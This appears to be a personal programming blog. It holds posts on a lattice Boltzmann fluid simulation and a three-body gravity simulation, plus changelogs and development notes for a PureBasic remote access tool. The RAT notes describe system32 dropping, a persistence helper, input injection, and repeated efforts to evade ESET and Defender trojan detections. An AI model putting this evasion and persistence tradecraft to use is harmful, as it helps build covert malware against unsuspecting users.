Putting it all together, we have a simple algorithm that, when done right, produces amazing-looking fluid animations. The steps I've followed in my code are: initialize all the cells, collide, stream, calculate each cell's macroscopic parameters, output, and repeat from collision.

I think I've explained the general method fairly completely. Now I'm going to briefly describe my specific implementation in JavaScript. The cells are represented as an array of rows, each row being an array of that row's cells. Each cell is an instance of a Cell class. Each cell instance stores its own particle distributions as an array, its macroscopic velocity and density, and a flag marking whether it is a solid obstacle. There are also the weights and the direction vectors, which really are constants and really should've been static members, seeing as they don't differ between instances, but I am under the impression that JavaScript doesn't yet have full support for static members in classes. The grid has its first and last rows and columns as boundary cells (read: dead cells) that have nothing to do with the actual fluid or obstacles; they are there just for visualization reasons, are marked as green cells (at least as of this writing), and are not iterated through in the algorithm. For convenience, from here on out, I will refer to the second rows and columns as the first, and the penultimate rows and columns as the last.
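The sketch below shows one way a Cell class could keep the weights and direction vectors as static class fields. It is a hypothetical sketch, not the post's actual code, and the property and method names are assumptions. Static methods have been part of JavaScript classes since ES2015; static class fields like these were standardized later (ES2022) but run in current browsers and recent Node versions.

```javascript
// Hypothetical Cell class with the D2Q9 constants as static class fields,
// shared by every instance instead of being copied into each one.
class Cell {
  static E = [[0, 0], [1, 0], [0, 1], [-1, 0], [0, -1], [1, 1], [-1, 1], [-1, -1], [1, -1]];
  static W = [4 / 9, 1 / 9, 1 / 9, 1 / 9, 1 / 9, 1 / 36, 1 / 36, 1 / 36, 1 / 36];

  constructor(isSolid = false) {
    this.f = Cell.W.slice(); // equilibrium for rho = 1, u = 0 is just the weights
    this.rho = 1;
    this.ux = 0;
    this.uy = 0;
    this.isSolid = isSolid;
  }

  // Recompute density and velocity from the current distributions.
  updateMacroscopic() {
    let rho = 0, mx = 0, my = 0;
    this.f.forEach((fi, i) => {
      rho += fi;
      mx += fi * Cell.E[i][0];
      my += fi * Cell.E[i][1];
    });
    this.rho = rho;
    this.ux = mx / rho;
    this.uy = my / rho;
  }
}

// The grid as an array of rows, each row an array of distinct Cell instances.
function makeGrid(rows, cols) {
  return Array.from({ length: rows }, () => Array.from({ length: cols }, () => new Cell()));
}

const grid = makeGrid(3, 4);
grid[1][1].isSolid = true; // mark an obstacle
```

Copying `Cell.W` with `slice()` in the constructor matters: each cell must own its distributions, so updating one cell's `f` can't silently change the shared weights or another cell.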

The first column of cells is initialized with the equilibrium particle distributions corresponding to the required inflow velocity. This is our inlet/inflow column, and it is unconditionally colored red. Depending on a switch, the rest of the cells are initialized either to the particle distribution corresponding to zero velocity or to the same inflow velocity as the first column. Personally, I favor initializing every cell to the inflow velocity's distributions.

After initialization is done, I perform the collision step, followed by the streaming process, on all fluid (non-solid) cells except those in the first column (the inlet column). Why the exception? I implement a fixed inlet boundary condition, i.e. the inlet column never changes its properties and is never streamed into, and collision would have little effect since the column is always at the equilibrium distribution f_i^eq corresponding to the specified inflow velocity.

A little detail regarding the streaming process: there are two ways to implement it. You can iterate through all the fluid cells and stream out from them to their non-solid neighbors, OR iterate through all the fluid cells and stream into them from their non-solid neighbors. At first, I inadvertently wrote the first kind of streaming procedure; later, I rewrote it as the second kind. The second kind turned out to be shorter and, I think, a bit more efficient. Think of it as pulling the distributions from the respective neighbors into the cell and keeping them as its own (in the same direction). In the case of a solid neighbor, there's nothing to pull from there, so the cell's own distribution pointing towards that neighbor is reflected right back to replace the cell's distribution in the opposite direction.

The open boundaries are: a fixed inlet boundary, a static outlet boundary, and periodic top and bottom boundaries. For the fixed inlet boundary, the first column's cells are held at a constant equilibrium particle distribution corresponding to the specified inflow velocity and never changed throughout the simulation. Streaming doesn't occur into these cells, and collision is pointless for them since all collision does is push the distributions towards equilibrium anyway. For the static outlet boundary, the distributions of the final column (the outlet/outflow column) are copied from the column to its immediate left. The upper and lower boundaries loop back to each other, in that 'above' for the first row is defined as the last row and 'below' for the bottom row is defined as the first row.
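Here is a sketch of these three open boundaries on a grid stored as `f[y][x]` (an array of 9 distributions per cell, D2Q9 order as above, c = 1). The helper names are hypothetical. One difference from the description: here the fixed inlet is re-imposed on every call rather than simply being skipped during streaming, which should have the same effect.

```javascript
// Open boundaries for a D2Q9 grid f[y][x] (sketch; names are hypothetical).
const E = [[0, 0], [1, 0], [0, 1], [-1, 0], [0, -1], [1, 1], [-1, 1], [-1, -1], [1, -1]];
const W = [4 / 9, 1 / 9, 1 / 9, 1 / 9, 1 / 9, 1 / 36, 1 / 36, 1 / 36, 1 / 36];

function equilibrium(rho, ux, uy) {
  const uSq = ux * ux + uy * uy;
  return E.map(([ex, ey], i) => {
    const eu = ex * ux + ey * uy;
    return W[i] * rho * (1 + 3 * eu + 4.5 * eu * eu - 1.5 * uSq);
  });
}

// Fixed inlet: column 0 always holds the equilibrium for the chosen inflow.
function applyInlet(f, rhoIn, uIn) {
  const feq = equilibrium(rhoIn, uIn, 0);
  for (const row of f) row[0] = feq.slice(); // each cell gets its own copy
}

// "Static" (zero-gradient) outlet: the last column copies its left neighbor.
function applyOutlet(f) {
  const last = f[0].length - 1;
  for (const row of f) row[last] = row[last - 1].slice();
}

// Periodic top/bottom: the row "above" the first row is the last row and vice
// versa. Use this to wrap neighbor row indices while streaming.
function wrapRow(y, ny) {
  return ((y % ny) + ny) % ny;
}
```

In a time loop, `applyOutlet` and `applyInlet` would plausibly be called right after streaming, so that the next collision step sees the boundary columns in their intended state.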

After collision and streaming, finally each cell's macroscopic parameters, density and velocity, are calculated according to the second and third expressions given a few paragraphs above.

Finally, while drawing it out on the canvas, the velocity's y component is inverted in sign, since the canvas puts the origin at the top-left corner with y increasing downwards. A few other cosmetic manipulations for a more sensible visualization are made before actually doing the painting.

The end result is a visually pleasing animation in the web browser.

References:

1. Lattice Boltzmann Modeling: An Introduction for Geoscientists and Engineers

2. The Lattice Boltzmann Method: Principles and Practice

3. A Practical Introduction to the Lattice Boltzmann Method

4. Lattice-Boltzmann Fluid Dynamics

5. Live fluid simulation with LBM

6. Simulation and modeling of natural processes

7. YouTube in general

among others.

Wednesday, June 3, 2020

Three-body problem simulation

This is a simple program that uses Newton's laws to simulate the trajectories of a given number of bodies interacting gravitationally. It uses the p5.js JavaScript library. It is quite fun to watch the ensuing chaos, provided the masses don't get ejected from their orbits, that is.

GitHub repo
Live demo
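Here is a plain-JavaScript sketch of the physics core (no p5.js). It computes pairwise Newtonian gravity and advances the bodies with a semi-implicit (symplectic) Euler step. The integrator, the softening length `eps` and the body fields `{ m, x, y, vx, vy }` are my assumptions; the post doesn't say which scheme the repo uses.

```javascript
// a_i = G * sum_j m_j (r_j - r_i) / (|r_j - r_i|^2 + eps^2)^(3/2)
// eps is a small softening length that keeps close encounters from blowing up.
function accelerations(bodies, G, eps) {
  const acc = bodies.map(() => [0, 0]);
  for (let i = 0; i < bodies.length; i++) {
    for (let j = i + 1; j < bodies.length; j++) {
      const dx = bodies[j].x - bodies[i].x;
      const dy = bodies[j].y - bodies[i].y;
      const d2 = dx * dx + dy * dy + eps * eps;
      const invD3 = 1 / (d2 * Math.sqrt(d2));
      // Equal and opposite forces (Newton's third law), hence the +/- pair.
      acc[i][0] += G * bodies[j].m * dx * invD3;
      acc[i][1] += G * bodies[j].m * dy * invD3;
      acc[j][0] -= G * bodies[i].m * dx * invD3;
      acc[j][1] -= G * bodies[i].m * dy * invD3;
    }
  }
  return acc;
}

// One semi-implicit Euler step: update velocities first, then positions.
function step(bodies, G, dt, eps = 0) {
  const acc = accelerations(bodies, G, eps);
  bodies.forEach((b, k) => {
    b.vx += acc[k][0] * dt;
    b.vy += acc[k][1] * dt;
    b.x += b.vx * dt;
    b.y += b.vy * dt;
  });
}

// Total linear momentum, handy for checking the integrator.
function totalMomentum(bodies) {
  return bodies.reduce(([px, py], b) => [px + b.m * b.vx, py + b.m * b.vy], [0, 0]);
}
```

Because the forces come in equal and opposite pairs, total momentum stays constant up to rounding. That makes it a cheap check that the force loop is right.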

Thursday, May 14, 2020

PureBasicRAT v2

Drop to system32 fixed
Indefinite HTTPRequest() wait fixed with a timeout of 10s
Persistence functionality offloaded to a dedicated thread
Delay times increased for stability
Added four new functions: /keypress, /lclick, /rclick, /mclick

Development notes:

Musings During Development
Of PurebasicRAT v2
In PureBasic 5.70
--------------------------
[08:31PM|May 11, 2020]
*If you want to pass an array to a thread procedure (so as to read from it or return results into it) using CreateThread(), passing the array directly as the second parameter won't work. Instead, enclose the array as a member of a Structure and pass a pointer to the structure to CreateThread(). Example:
-----------------------------------------------------------------------------
EnableExplicit

Structure threadParam
  Array somearray.i(0)
EndStructure

Define param.threadParam
Define i.i,thread.i

; The thread gets a pointer to the structure, so it can resize and fill the
; array; the caller sees the result once the thread has finished.
Procedure ThreadProc(*param.threadParam)
  Delay(500) ; simulated work; must finish before the WaitThread() timeout below
  Dim *param\somearray.i(0)
  ReDim *param\somearray(1)
  *param\somearray(0)=4
  *param\somearray(1)=231524
EndProcedure

thread=CreateThread(@ThreadProc(),@param)
WaitThread(thread,1000) ; stop waiting after 1 s
If IsThread(thread) ;thread is stuck, most likely at the HTTPRequest function
  KillThread(thread)
  Debug "Thread killed!"
EndIf

; The array is 0-based here, so loop from 0 up to ArraySize()
For i=0 To ArraySize(param\somearray())
  Debug Str(param\somearray(i))
Next i
-------------------------------------------------------------------------
[11:44PM|May 11, 2020]
*The stub just got detected by ESET Smart Security as the Win32/Agent.UFQ trojan. Should've disabled ESET LiveGrid submission. Will try changing a couple of things to throw it off. BTW, kleenscan.com is a site that offers free no-distribution AV scans. Seems to be a project by an HF member.
[12:19PM|May 12, 2020]
*MSDN gives the impression that SendInput(), which supersedes keybd_event(), is in some ways "weaker" despite being "higher-level", because its Return Value section says that SendInput() is subject to UIPI. No such remark seems to be made for keybd_event(). I checked: keybd_event() is restricted by the user privilege level just the same. No benefit in using keybd_event().
*Applications typically (though not all games) ignore the key scan code and only care about the virtual-key code; that's why, most of the time, one can get away with specifying only the first parameter of the keybd_event() function. ref:https://stackoverflow.com/questions/15062577/what-is-the-meaning-of-the-bscan-parameter-value-0x45-in-keybd-event
[02:55PM|May 12, 2020]
*I always make the mistake of forgetting to bit-shift after AND'ing when extracting the high-order byte (the most significant byte), generally of a SHORT value. Case in point: VkKeyScan().
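To make the pitfall concrete: VkKeyScan() packs two values into its SHORT return value. The low-order byte holds the virtual-key code. The high-order byte holds the shift state (1 = Shift, 2 = Ctrl, 4 = Alt), and both bytes are -1 when no key produces the character. This JavaScript sketch decodes such a value; the input 0x0141 is just an illustrative Shift + VK 0x41 combination.

```javascript
function loByte(word) {
  return word & 0xff;
}

// Shift down, then mask. Masking alone, (word & 0xff00), leaves the
// value 256 times too large, which is exactly the mistake described above.
function hiByte(word) {
  return (word >> 8) & 0xff;
}

// Splits a VkKeyScan()-style result into the virtual-key code and shift flags.
function decodeVkKeyScan(result) {
  const vk = loByte(result);
  const shiftState = hiByte(result);
  return {
    vk,
    shift: (shiftState & 1) !== 0,
    ctrl: (shiftState & 2) !== 0,
    alt: (shiftState & 4) !== 0,
  };
}

console.log(decodeVkKeyScan(0x0141)); // { vk: 65, shift: true, ctrl: false, alt: false }
```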
[12:42PM|May 13, 2020]
*mouse_event() and keybd_event() are much simpler to use than SendInput(), which is probably why I don't remember ever using SendInput() before.
[03:55PM|May 13, 2020]
*CPU usage has shot up, probably because I decreased the Delay() times everywhere. Increased it back a bit in the persistence routine, so it's a tad better now, but still not very good. It clearly shows in Task Manager. Also, haven't managed to shake off that Win32/Agent.UFQ detection by ESET Smart Security.
[07:03PM|May 13, 2020]
*ESET Smart Security detection chain:
commandexecutor.pbi->machineinfogatherer.pbi,messagesender.pbi
Inside machineinfogatherer.pbi:
CPUName()
[09:42PM|May 13, 2020]
*Found another bug. If the drop path is set to %system32% and the x86 binary is used on an x64 system, the function getDropPath() in configreader.pbi outputs "C:\Windows\system32", which is wrong. Due to the "File System Redirector" (https://docs.microsoft.com/en-us/windows/win32/winprog64/file-system-redirector), any file operation on this path, such as CopyFile(), DeleteFile() or OpenFile(), is redirected to "C:\Windows\SysWOW64" instead. As a result, the server is copied into the "C:\Windows\SysWOW64" folder and runs from there, only to compare its location with "C:\Windows\system32", so it keeps copying itself to the same path ("C:\Windows\SysWOW64") over and over. The guilty code is the following line in the getDropPath() procedure in the configreader.pbi file:
----------------------------
Case "%system32%"
retval=GetEnvironmentVariable("windir")+"\system32"
----------------------------
where we're manually tacking the string "\system32" onto the %windir% path. We need a check here. If we're an x64 executable, the code is fine. If we're an x86 executable, we need to check the OS. For that, we use the IsWow64Process() function. If the OS is x64 (and the process is x86), the BOOL pointed to by the function's second parameter receives TRUE, so "\system32" has to be replaced with "\SysWOW64". If the OS is x86 (and the process is x86), it receives FALSE and the code is fine.

ref:
https://stackoverflow.com/questions/3094520/how-to-retrieve-correct-path-of-either-system32-or-syswow64
https://stackoverflow.com/questions/23696749/how-to-detect-on-c-is-windows-32-or-64-bit
https://www.purebasic.fr/english/viewtopic.php?f=12&t=40061
https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/nf-sysinfoapi-getnativesysteminfo
https://docs.microsoft.com/en-us/windows/win32/api/sysinfoapi/ns-sysinfoapi-system_info
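The decision logic of the fix can be sketched as pure functions, here in JavaScript. The names `system32DropPath`, `isRunningFrom` and `server.exe` are hypothetical. The boolean stands in for what IsWow64Process() reports. That flag is TRUE only for a 32-bit process on 64-bit Windows: a 64-bit process and a 32-bit process on 32-bit Windows both get FALSE. So this one flag covers all three cases described above.

```javascript
// isWow64: what IsWow64Process() reports for the running process.
function system32DropPath(windir, isWow64) {
  // Under WOW64 the File System Redirector sends "system32" file operations
  // to "SysWOW64", so that is where the copy actually ends up.
  return windir + (isWow64 ? "\\SysWOW64" : "\\system32");
}

// Windows paths are case-insensitive, so the "am I already installed?"
// comparison should ignore case as well.
function isRunningFrom(exePath, dropDir) {
  const exeDir = exePath.slice(0, exePath.lastIndexOf("\\"));
  return exeDir.toLowerCase() === dropDir.toLowerCase();
}
```

With `isWow64 = false` hard-coded, the copy living in SysWOW64 never matches the expected folder. That is the endless self-copy loop from the bug.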
[09:12AM|May 14, 2020]
*I did a control test of whether a timer or a sleep loop would be better for minimizing CPU usage. (ref: https://stackoverflow.com/questions/15685095/how-to-use-settimer-api ) Turns out, there's not much difference:
-----------------------------------
; 0.12% CPU usage:
Repeat
  Debug GetTickCount_()
  Delay(50)
ForEver
-----------------------------------
; 0.14% CPU usage:
Procedure timerProc(_.i,__.i,___.i,____.i)
  Debug GetTickCount_()
EndProcedure

Define msg.MSG
SetTimer_(0,0,50,@timerProc())
While GetMessage_(@msg,0,0,0)
  DispatchMessage_(@msg)
Wend
-----------------------------------
If anything, contrary to what I had thought, the timer performed worse. I tried an interval of 100ms as well, with similar results.
Guess there's no escaping it.
[01:23PM|May 14, 2020]
*When I run the server in my VM (Win10 x86, 2GB RAM), Windows Defender seems to pick it up (Win32/Hupigon.CN). Don't know if it's related, but the server fails to run from the right install directory. Copying to the install directory goes fine, but the program doesn't run from there; it just exits. Probably because the server in the install directory loads up too quickly and detects the previous instance before that instance has had time to quit. So, gotta add a "/delay" switch to the command line for such launches, check for it at the beginning of the program, and sleep for a couple of seconds before continuing. A similar thing happens when starting the persistor. In persistence.pbi, copying the persistor to temp and running it there happens fine. But when the next iteration of the realtime persistence loop starts, the server still doesn't detect the persistor running. Hence, this continuously spawns random persistor exes in temp and runs them, but the fact that the server never detects the persistor implies the persistor itself isn't running. I'm guessing it's the same thing as the server's launch-from-the-right-folder problem: the new instance from the install path runs too quickly, detects the old instance and quits. Gotta add the delay switch to the persistor as well. Gosh, the whole setup seems so brittle.
*TL;DR: we need both the server and the persistor to pause for a while IF THEY'VE BEEN LAUNCHED BY THEMSELVES, so that the multiple-instance check isn't triggered, which would otherwise cause the programs to just stop.
*Oddly enough, it doesn't happen outside the VM, in the real machine.
[03:15PM|May 14, 2020]
*Got duped by the PureBasic function ProgramParameter(). Its index parameter is optional, but when it's omitted, each call returns the next parameter, i.e. an internal index is increased every time the function is called. Lost about an hour to this.
*Just discovered how glitchy Process Explorer can be (in a VM, anyway).

Monday, May 11, 2020

PureBasicRAT

This is a Remote Administration Tool I've made using PureBasic. I wanted to learn the language, so I decided to do it with this project. The project code is compatible with both x86 and x64 architectures; just compile the source with the corresponding PB compiler. The GitHub repo is here. The builder is a simple GUI that looks like this:

I've jotted down the thoughts that came to mind during development in a text file, the contents of which I'm putting down here, so I won't be explaining any further. The flow of the program is summarized in a 'flowchart.html' file available in the repo linked above:

Musings During Development
Of PurebasicRAT
In PureBasic 5.70
--------------------------
*hard time finding good examples online. documentation is good and beginner-friendly most of the time though. i know, small userbase
*messy array/pointer/list returning from procedures. better off filling a parameter buffer
*confusing syntax, especially with EnableExplicit on. shows the language is geared towards not doing that.
*the module system is a joke. better-off without it
*ArraySize() gives the size of the array AS SPECIFIED WITH DIM OR REDIM. this is trippy as well. an ArraySize() of 0 means there's one element in the array. I guess this is to conform with QBASIC/VB6 syntax. seems like i've forgotten how looping through an array worked in VB6, lol.
*there's no way AFAIK to check if a dynamic array is empty in purebasic if you start from the index 0. to declare a dynamic array, you must specify a size (unlike in vb6). so, dim a() is not possible. it must be dim a(0) or some other positive number instead of 0. but you don't know what the final size of the array is going to be! that's what a dynamic array is for! if it is something returned from a procedure, you will want to check if there's any element in the array. but if the array is 0-indexed, there will always be that a(0) i.e. the first element created during dim'ing. ArraySize() will return 0 regardless of the return value of the procedure. maybe the procedure didn't add any element. maybe it added just one element. we don't know. can't tell using ArraySize() alone. So, best use 1-based index.
*redim array(0) is valid. it makes room for a total of one element in purebasic. see arrays in purebasic help file
*jsonarray is 0-indexed
*output file size quickly balloons even when GUI api, the likes of OpenWindow() and such, haven't been used. the network library functions single-handedly add 200KB. single line of code: UsePNGEncoder() adds another 220KB
*good purebasic guide : https://www.ninelizards.com/purebasic A lot of google searches point there
*StringField() is not well documented. had to fiddle around with it to figure out what exactly it did. it's nice.
*variables going out of scope when creating threads from procedures. nice. learning some. use of Static variables in procedures
*nightmare to find where a method has been implemented for projects involving multiple include files
*resources that were easily available a few years ago on some topics(like HTTP mechanism) seem to be lost to the vastness of the internet now. i don't know if i'm totally correct but IIRC, there was a website that did an excellent job of completely describing the totality of HTTP to a beginner. i can't seem to find that exact resource readily now. maybe i'm just imagining things. maybe there wasn't just one such great resource. maybe https://www.jmarshall.com/easy/http/ is it? Got that from a StackOverflow answer https://stackoverflow.com/a/2773415/7647225
*a lot of my time is being spent revisiting how I coded things in VB6 back in the day. I sure hope it doesn't always hold me back. i did a lot of things without actually understanding how they worked, learning by looking at other people's code. case in point, reading a binary file's content into a string buffer.
*HTTP requests are best learnt by emulating browsers and other HTTP clients such as PostMan, I've come to learn. i've been searching for the "proper" way to upload files via HTTP POST for the better part of the day, but no resource on the internet seems complete, not even RFC2616. some of the headers I see in the PostMan console/google chrome DevTools seemingly have no explanation. RFC2616 has only a passing mention of Content-Type: multipart/form-data for uploading files and of the required fields in the HTTP request body between boundaries. scattered information here and there only adds to the confusion, and most SO threads just tell the OPs to STFU and use the available HTTP libraries for their language to upload files. anyway, I just gave up on trying to find a good, complete HTTP resource for developers and emulated PostMan's HTTP POST request. ofc that worked. i really was expecting more clarity on the topic. which fields are required for file upload? which headers? what's "content-disposition"? David Gourley's "HTTP: The Definitive Guide" comes close, talking about it briefly on page 326, but it's not convincing. web searches on constructing a raw HTTP request for file upload are mostly useless or very meagre/scattered.
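For the record, multipart/form-data isn't specified in RFC 2616 itself but in its own RFC (RFC 2388, since replaced by RFC 7578). That RFC defines the per-part `Content-Disposition: form-data; name="..."; filename="..."` header. Below is a minimal Node.js sketch of a raw single-file upload request along those lines. The host, path, boundary and field name are placeholders, and real servers may expect additional headers.

```javascript
// Body of a multipart/form-data request with one file field.
// The boundary string must not occur anywhere inside the file content.
function buildMultipartBody(boundary, fieldName, fileName, contentType, fileBytes) {
  const CRLF = "\r\n";
  const head =
    "--" + boundary + CRLF +
    `Content-Disposition: form-data; name="${fieldName}"; filename="${fileName}"` + CRLF +
    "Content-Type: " + contentType + CRLF +
    CRLF; // blank line separates the part's headers from its content
  const tail = CRLF + "--" + boundary + "--" + CRLF; // closing delimiter
  return Buffer.concat([Buffer.from(head, "utf8"), fileBytes, Buffer.from(tail, "utf8")]);
}

// Wraps the body in a raw HTTP/1.1 POST; Content-Length counts bytes, not characters.
function buildUploadRequest(host, path, boundary, body) {
  const headers =
    `POST ${path} HTTP/1.1\r\n` +
    `Host: ${host}\r\n` +
    `Content-Type: multipart/form-data; boundary=${boundary}\r\n` +
    `Content-Length: ${body.length}\r\n` +
    "Connection: close\r\n" +
    "\r\n";
  return Buffer.concat([Buffer.from(headers, "utf8"), body]);
}
```

Working with Buffers rather than strings keeps binary file content intact. It also makes `Content-Length` come out in bytes.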
*three-pass protocol in cryptography. commutative encryption. interesting. from https://www.youtube.com/watch?v=qWKK_PNHnnA
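Here is a toy sketch of Shamir's three-pass protocol, which as far as I can tell is the commutative-encryption scheme the video covers. It uses exponentiation modulo a prime with JavaScript BigInt. Each party picks a secret exponent e coprime with p - 1 and its inverse d modulo p - 1. The prime 2^31 - 1 and the exponents are illustrative only and far too small for real use.

```javascript
// Modular exponentiation by repeated squaring.
function modPow(base, exp, mod) {
  let result = 1n;
  base %= mod;
  while (exp > 0n) {
    if (exp & 1n) result = (result * base) % mod;
    base = (base * base) % mod;
    exp >>= 1n;
  }
  return result;
}

// Modular inverse via the extended Euclidean algorithm.
function modInverse(a, m) {
  let [r0, r1] = [a % m, m];
  let [s0, s1] = [1n, 0n];
  while (r1 !== 0n) {
    const q = r0 / r1;
    [r0, r1] = [r1, r0 - q * r1];
    [s0, s1] = [s1, s0 - q * s1];
  }
  if (r0 !== 1n) throw new Error("no inverse: gcd(a, m) != 1");
  return ((s0 % m) + m) % m;
}

// A "lock" is a secret exponent and its inverse modulo p - 1.
function makeLock(e, p) {
  return { e, d: modInverse(e, p - 1n) };
}

// A locks, B adds its lock, A removes its lock, B removes its lock.
// Works because (m^a)^b = (m^b)^a mod p, i.e. the locks commute.
function threePass(m, p, alice, bob) {
  const pass1 = modPow(m, alice.e, p);       // A -> B
  const pass2 = modPow(pass1, bob.e, p);     // B -> A
  const pass3 = modPow(pass2, alice.d, p);   // A -> B
  const recovered = modPow(pass3, bob.d, p); // B unlocks
  return { pass1, pass2, pass3, recovered };
}

const P = 2147483647n; // 2^31 - 1, a prime

const demo = threePass(123456789n, P, makeLock(5n, P), makeLock(13n, P));
console.log(demo.recovered); // 123456789n
```

The exponents 5 and 13 were chosen because neither divides p - 1 = 2 · 3² · 7 · 11 · 31 · 151 · 331, so both are invertible.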
*DW Service's new agent creation process is simple but misleading. the group name is to be left unfilled for the first agent created, since there are no groups in the beginning. they could've made that clear with a textbox hint. was banging my head over why i couldn't create a new agent. Jesus freakin Christ.
*https://www.dwservice.net->Free and Open Source remote control software. I'm torn between some kind of SSH client such as PuTTY and full-fledged remote control software to include with the program. I need the ability to browse through the files and download/upload them. SSH requires the username and password of the device's account. so, thinking about going with a remote desktop solution such as DW Service. https://www.dnsstuff.com/teamviewer-alternatives pointed me toward it. DW Service supports silent mode as well, https://www.dwservice.net/en/faq.html
*MUST HAVE ADMIN RIGHTS to run DW Agent
*Nevermind, DW Service only allows silent INSTALL. not silent mode. lol. so won't be using DW Service. i don't think any "legal" remote desktop software would allow such a thing.
*Command line redirections. nice stuff. i knew about them, just not that they were called that. lol. trace of this thought:
https://support.anydesk.com/Command_Line_Interface ->Uses pipe to direct info into application
https://ss64.com/->Cool website for help on command line
*I know there were hacks to make console VB6 apps back in the day but here it is anyway, the right resources are still there on the web to my surprise:
https://stackoverflow.com/questions/286924/how-do-i-build-a-vb6-console-app
http://vb.mvps.org/samples/Console/
http://www.mvps.org/st-software/api_usage.htm
http://www.vbforums.com/showthread.php?541443-StdIn-amp-StdOut-console-app
*Stumbled upon a great book by Matthew Curland on VB6: Advanced Visual Basic 6 Power techniques for everyday programs on libgen
*AnyDesk looks promising. Got a command line interface. Can silent install with a password for unattended access, but the window will show. Tray icon shows. Could hack around with the Windows API to hide those but... too hacky for me. Feels too brittle. I pass. Gives me an idea for the next project though. :P
*Google Chrome's software cleanup tool is making my system crawl. Second time it has done that. Uninstalling it. Firefox FTW!
*Learning a lot about SSH and reverse tunneling. Nice resources:
https://causeyourestuck.io/2016/04/17/reverse-shell/
https://causeyourestuck.io/2016/04/18/reverse-ssh-also-android/
https://unix.stackexchange.com/questions/46235/how-does-reverse-ssh-tunneling-work
https://serverfault.com/questions/888693/which-command-is-used-to-establish-ssh-tunnel-in-windows
https://www.howtogeek.com/428413/what-is-reverse-ssh-tunneling-and-how-to-use-it/
https://www.pugetsystems.com/labs/hpc/How-To-Use-SSH-Client-and-Server-on-Windows-10-1470/#sshfromWindows10toWindows10
*Linux Manjaro x64 doesn't work on VirtualBox. Installed Linux Mint x86 instead. Doing this for ssh server. OpenSSH does have a server for windows and windows 10 seems to have it as an optional feature but spare me the trouble. Just easier on linux.
*There are a lot of resources about SSH tunneling on the internet, but here's what I've learnt. SSH allows an encrypted connection to be established between two computers on the internet (or any network). The computer initiating the connection is the client; the one accepting it is the server. Thus SSH has two components: client and server. The client computer runs the SSH client software and the server runs the SSH server software. Windows doesn't seem to be used much as an SSH server, hence there's not much choice of SSH server software on Windows. There are a lot more choices for SSH client software, though. PuTTY is one such SSH client. Newer versions of Windows 10 seem to have the OpenSSH client by default, accessible through the command prompt using the command "ssh", similar to Linux. There are commercial SSH servers for Windows, but Windows 10 does seem to provide the free OpenSSH server as an optional feature that can be manually enabled. It requires some configuration, though; tutorials for that are aplenty on the internet. For the purpose of learning about SSH, I used Linux, where both the client and the server are either present by default or trivial to get up and running. On Linux Mint, the distro that I used, it was just one "apt-get install openssh" away. That installs both the client and the server software. First, here's how SSH is typically used, the straightforward way:
I've got a computer A that wants to access computer B. So, A is the client and B is the server, per our terminology. What one would do is run the SSH server program on computer B. This program keeps listening on port 22 (typically) of computer B for incoming connections, and when a connection request arrives at that port, the connection is established. Computer A needs an SSH client installed, which it uses to connect to the SSH server of computer B. This is usually done as follows, where the SSH client program is invoked by the "ssh" command:
-->ssh usernameOfComputerB@IPaddressOfComputerB
The server running on computer B detects this connection request and asks the client for the password associated with the username of computer B. If you want to access computer B, then you better know the credentials of the machine, right?
If a valid password is given, computer A can access computer B with absolute authority. It's as if a portal is created from computer A to computer B. Using computer A, a user can control computer B.
But that's not all that interesting. What's so useful about SSH is its port forwarding ability. As https://www.ssh.com/ssh/tunneling/example describes,
'SSH port forwarding is a mechanism in SSH for tunneling application ports from the client machine to the server machine, or vice versa. It can be used for adding encryption to legacy applications, going through firewalls, and some system administrators and IT professionals use it for opening backdoors into the internal network from their home machines. It can also be abused by hackers and malware to open access from the Internet to the internal network.' There are two types of port forwarding covered here: local and remote (OpenSSH also has dynamic forwarding, -D, which turns the tunnel into a SOCKS proxy). A nice description of typical situations where one would use these is given at https://help.ubuntu.com/community/SSH/OpenSSH/PortForwarding.
Keep in mind that you ssh from the client computer into the server computer (where the SSH server is running). SSH commands are issued on the client side. And port forwarding is set up after the connection from client to server is established, though all of this may happen with just one command.
Ok, now, LOCAL forwarding works like this:
first, your ssh client (computer A) establishes a connection with the specified ssh server (computer B):
______________________
A ______________________ B

then it sets up a listener locally (on computer A itself) at a port you specify. Any connection made to this port by other applications on computer A will be funnelled to computer B and, from there, out to another port you specify. On the command line, it looks like this (remember, you run this from computer A, i.e. the client):
-->ssh usernameOfComputerB@IPaddressOfComputerB -L 8585:localhost:3232
The -L switch means local port forwarding. 8585 is the local port (on computer A). 3232 is the remote port (on computer B, i.e. the one running the SSH server). localhost represents computer B, because the name is resolved by the SSH server. So the first port is the client side's (A's) port, and the parts after it are the server side's (B's) parameters. So, here, the SSH server running on computer B passes whatever comes in on client port 8585 on to computer B itself (localhost, from the SSH server's perspective) at port 3232.
So, you ask any program running on A to connect to local port 8585, and it magically connects to B at port 3232 through the SSH tunnel. This can be useful for preventing plaintext information from being intercepted in the middle, since an SSH connection is encrypted by nature, and any communication occurring through the proverbial tunnel created by the SSH connection is itself going to be encrypted. Simply ssh'ing into a server gives us remote control (a shell, in networking lingo) over the server. But with port forwarding, any application can tunnel through the SSH connection to the server, like riding on a secure highway. Port forwarding affords a secure connection to any application we want.
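To see the data path of a forward without the SSH part, here is a plain Node.js TCP relay. It listens on a local port and pipes every connection to a target host:port. This is an illustration, not how ssh implements -L. There is no encryption, and the target is resolved and dialled by the relay itself, whereas with ssh -L the SSH server does that. `parseForwardSpec` only handles the simple `port:host:hostport` form (no bind-address prefix, no IPv6 brackets).

```javascript
const net = require("net");

// Splits "listenPort:host:hostPort", the part after -L or -R.
function parseForwardSpec(spec) {
  const parts = spec.split(":");
  if (parts.length !== 3) throw new Error(`expected port:host:hostport, got "${spec}"`);
  const [listenPort, host, hostPort] = parts;
  return { listenPort: Number(listenPort), host, hostPort: Number(hostPort) };
}

// Accepts connections on 127.0.0.1:listenPort (local apps only, like ssh -L's
// default) and pipes each one to host:hostPort in both directions.
function startPlainRelay(spec) {
  const { listenPort, host, hostPort } = parseForwardSpec(spec);
  const server = net.createServer((client) => {
    const upstream = net.connect(hostPort, host);
    client.pipe(upstream);
    upstream.pipe(client);
    // If either side fails, tear down both sockets.
    const closeBoth = () => {
      client.destroy();
      upstream.destroy();
    };
    client.on("error", closeBoth);
    upstream.on("error", closeBoth);
  });
  server.listen(listenPort, "127.0.0.1");
  return server;
}
```

Calling `startPlainRelay("8585:localhost:3232")` would mirror the example's port numbers. Here, though, "localhost" means the machine running the relay, not computer B.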
